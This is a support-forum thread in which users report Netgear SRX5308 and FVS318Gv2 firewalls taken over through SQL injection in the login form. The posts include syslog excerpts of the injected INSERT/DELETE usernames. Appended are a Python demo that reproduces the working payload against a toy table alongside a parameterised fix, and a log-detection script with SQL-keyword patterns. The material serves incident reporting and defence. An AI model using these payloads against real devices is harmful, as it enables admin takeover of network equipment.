Aspirant

Successful hack of our SRX5308

Hi,

Our SRX5308 was successfully hacked on Sep 27th. They seem to have found a SQL password that keeps users in an internal database and injected a new user 'app'. We had SYSLOG to another machine, so we caught the successful attempt and steps:

I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password.

Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'


Model: SRX5308|PROSAFE Gigabit Quad WAN SSL & IPSEC VPN Firewall
Message 1 of 5
Aspirant

Re: Successful hack of our SRX5308

It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!

Message 2 of 5
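The injection the reply above calls "old school", as an added example that is not Netgear's code: a toy login routine against an in-memory SQLite table pastes the username straight into the query, beside a parameterised version of the same lookup. The table (only the columns the logged INSERT names), the stored password, the attacker's VALUES and the use of SQLite itself are assumptions; so is modelling the device's database driver as one that runs stacked statements in order and stops at the first error, which the log supports since the injected INSERT took effect while the login still failed.

```python
import sqlite3

# Assumed, reduced stand-in for the device's user table: only four of the
# columns named in the logged INSERT, and a plaintext password for brevity.
SCHEMA = """
CREATE TABLE USERDBUsers (
    UserName  TEXT PRIMARY KEY,
    GroupName TEXT,
    UserType  TEXT,
    Password  TEXT
);
INSERT INTO USERDBUsers VALUES ('myxxxx', 'geardomain', 'Admin', 'correct horse');
"""


def new_db() -> sqlite3.Connection:
    # isolation_level=None gives autocommit, as a C caller of sqlite3_exec() gets.
    conn = sqlite3.connect(":memory:", isolation_level=None)
    conn.executescript(SCHEMA)
    return conn


def exec_stacked(conn: sqlite3.Connection, sql: str) -> list:
    """Run every statement in `sql` in order, the way libsqlite's sqlite3_exec()
    does: the first syntax error stops the rest, but everything before it has
    already taken effect. Python's Cursor.execute() refuses stacked statements,
    so the string is split with sqlite3.complete_statement() (assumed model of
    the device's driver, not Netgear code)."""
    rows, buf = [], ""
    for piece in sql.split(";"):
        buf += piece + ";"
        if not sqlite3.complete_statement(buf):
            continue  # the ';' was inside a string literal; keep accumulating
        stmt, buf = buf.strip(), ""
        try:
            rows.extend(conn.execute(stmt).fetchall())
        except sqlite3.OperationalError:
            break
    return rows


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Username concatenated into the query: this is the hole.
    sql = f"SELECT Password FROM USERDBUsers WHERE UserName='{username}'"
    rows = exec_stacked(conn, sql)
    return bool(rows) and rows[0][0] == password


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameter: the username is only ever a value, never SQL.
    row = conn.execute(
        "SELECT Password FROM USERDBUsers WHERE UserName = ?", (username,)
    ).fetchone()
    return row is not None and row[0] == password


def user_exists(conn: sqlite3.Connection, name: str) -> bool:
    return conn.execute(
        "SELECT 1 FROM USERDBUsers WHERE UserName = ?", (name,)
    ).fetchone() is not None


# Payloads shaped like the usernames in the logs: close the quote, stack a
# statement, and end with ;' so the application's own closing quote becomes a
# trailing '' that errors only after the damage is done. The VALUES are assumed.
ADD_APP = ("myxxxx';INSERT INTO USERDBUsers(UserName,GroupName,UserType,Password) "
           "VALUES ('app','geardomain','Admin','attacker-chosen');'")
DROP_APP = "myxxxx';delete from USERDBUsers where UserName='app';'"


def demo() -> tuple:
    vuln = new_db()
    vulnerable_login(vuln, ADD_APP, "wrong")      # logged as "Invalid Password", INSERT ran anyway
    added = user_exists(vuln, "app")
    attacker_in = vulnerable_login(vuln, "app", "attacker-chosen")
    vulnerable_login(vuln, DROP_APP, "wrong")     # the clean-up seen at the end of the log
    removed = not user_exists(vuln, "app")

    safe = new_db()
    safe_login(safe, ADD_APP, "wrong")            # same payload, no effect
    return added, attacker_in, removed, user_exists(safe, "app")


if __name__ == "__main__":
    print(demo())
```

The parameterised query is the fix; escaping (the `db_escape` the reply mentions) would also stop this particular payload, but binding parameters removes the whole class of bug rather than one character.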
Tutor

Re: Successful hack of our SRX5308

These have been out of support for a little while now. Sadly, Netgear hasn't seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.

Message 3 of 5
Apprentice

Re: Successful hack of our SRX5308

This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500: end of support and firmware upgrades. Sadly, the BR500 is not reliable.

The pessimist complains about the wind, the optimist hopes it will change, the engineer adjusts the sails...
Message 4 of 5
Aspirant

Re: Successful hack of our SRX5308

Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken.


[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app

Model: FVS318Gv2|ProSafe gigabit 8 port VPN firewall
Message 5 of 5
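Detection logic for the syslog lines posted in Message 1 and Message 5, as an added example that is not part of either post: it flags login failures whose username carries SQL quotes, semicolons, comment markers or DML keywords, successful logins by any account outside an allowlist of known admins, and the "Administrator ... is successfully added" event the FVS318Gv2 logged. The sample log copies lines from both posts (the truncated INSERT line is truncated as in the post) plus two constructed benign lines, a login by the real admin from 192.0.2.10 and a plain wrong-password failure, to show what is not flagged; the allowlist is assumed.

```python
import re
from dataclasses import dataclass

# Timestamp in either format seen in the thread: "Sep 27 16:19:34" (SRX5308)
# or "Wed Nov 20 06:51:56 2019(GMT-0700)" (FVS318Gv2).
TS_RE = re.compile(r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d(?: \d{4})?)")
FAILED_RE = re.compile(r"SSL_ERROR: Invalid Password for user (?P<user>.*)$")
SUCCESS_RE = re.compile(
    r"SSL_INFO ?: Login Successful for (?P<domain>\S+) user "
    r"(?P<user>[^(]+)\((?P<role>[^)]+)\) from host (?P<host>\S+)"
)
ADDED_RE = re.compile(r"Administrator (?P<user>\S+) is successfully added")
# Quote, semicolon, comment marker or a DML/DDL keyword: none belong in a username.
SQLI_RE = re.compile(r"""['";]|--|\b(?:insert|delete|update|drop|union|select)\b""",
                     re.IGNORECASE)

# Lines 1-6 copied from the posts above; lines 7-8 constructed benign traffic.
SAMPLE_LOG = """\
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5
[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90
Sep 28 09:00:00 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user myxxxx(Admin) from host 192.0.2.10
Sep 28 09:05:00 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx
"""


@dataclass
class Alert:
    kind: str        # "sqli_attempt", "unknown_user_login" or "admin_added"
    timestamp: str
    user: str
    detail: str


def analyze(log_text: str, known_users: set) -> list:
    """Return one Alert per suspicious line, in log order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_m = TS_RE.search(line)
        ts = ts_m.group("ts") if ts_m else "?"
        if m := FAILED_RE.search(line):
            user = m.group("user")
            if SQLI_RE.search(user):
                alerts.append(Alert("sqli_attempt", ts, user[:60], "SQL in username field"))
        elif m := SUCCESS_RE.search(line):
            user = m.group("user").strip()
            if user not in known_users:
                alerts.append(Alert("unknown_user_login", ts, user,
                                    f"{m.group('role')} login from {m.group('host')}"))
        elif m := ADDED_RE.search(line):
            # Any account creation on a firewall deserves a look, allowlisted or not.
            alerts.append(Alert("admin_added", ts, m.group("user"), "new administrator account"))
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG, {"myxxxx"}):   # assumed allowlist of legitimate admins
        print(f"{a.timestamp:22} {a.kind:20} {a.user:12} {a.detail}")
```

Point the script at the file your syslog collector writes for the device; the three rules are independent, so a forwarded feed that only contains the LOGIN facility still yields the first two.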